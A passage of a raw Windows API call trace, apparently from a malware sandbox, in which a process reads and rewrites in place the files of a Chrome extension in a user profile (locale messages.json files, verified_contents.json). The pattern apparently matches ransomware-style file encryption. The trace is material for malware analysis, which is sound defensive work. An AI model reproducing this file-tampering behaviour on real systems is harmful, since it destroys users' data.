lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.025] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2adeb [0150.025] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.025] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0150.025] ReleaseMutex (hMutex=0x168) returned 1 [0150.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mirroring_common.js", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0150.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mirroring_common.js", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mirroring_common.js", lpUsedDefaultChar=0x0) returned 19 [0150.025] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0150.027] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x29deb [0150.027] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0150.028] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x29deb [0150.028] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0150.029] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0150.029] WriteFile (in: hFile=0x1d4, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0150.030] CloseHandle (hObject=0x1d4) returned 1 [0150.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0150.032] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.032] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4029 [0150.032] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.032] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0150.033] ReleaseMutex (hMutex=0x168) returned 1 [0150.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0150.033] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0150.035] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3029 [0150.035] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0150.037] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3029 [0150.037] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0150.037] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0150.037] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0150.037] CloseHandle (hObject=0x1d4) returned 1 [0150.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0150.039] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.039] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3f4c [0150.039] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.039] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0150.039] ReleaseMutex (hMutex=0x168) returned 1 [0150.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0150.039] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0150.041] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2f4c [0150.041] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0150.043] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2f4c [0150.043] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0150.044] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0150.044] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0150.044] CloseHandle (hObject=0x1d4) returned 1 [0150.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0150.046] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.046] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3f0c [0150.046] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0150.046] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0150.046] ReleaseMutex (hMutex=0x168) returned 1 [0150.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0150.046] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.293] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2f0c [0152.293] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.294] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2f0c [0152.295] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.296] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0152.296] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.296] CloseHandle (hObject=0x1d4) returned 1 [0152.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0152.297] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.297] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5224 [0152.298] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.298] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.298] ReleaseMutex (hMutex=0x168) returned 1 [0152.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0152.298] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.300] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4224 [0152.300] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.309] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4224 [0152.309] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.310] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0152.310] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.310] CloseHandle (hObject=0x1d4) returned 1 [0152.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0152.311] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.312] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x40db [0152.312] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.312] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.312] ReleaseMutex (hMutex=0x168) returned 1 [0152.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0152.312] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.317] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x30db [0152.317] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.318] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x30db [0152.319] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.319] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0152.319] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.319] CloseHandle (hObject=0x1d4) returned 1 [0152.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0152.320] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.321] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5593 [0152.321] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.321] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.321] ReleaseMutex (hMutex=0x168) returned 1 [0152.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0152.321] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.324] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4593 [0152.324] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.325] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4593 [0152.325] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.326] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0152.326] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.326] CloseHandle (hObject=0x1d4) returned 1 [0152.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0152.327] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.327] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3e39 [0152.327] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.327] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.328] ReleaseMutex (hMutex=0x168) returned 1 [0152.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, 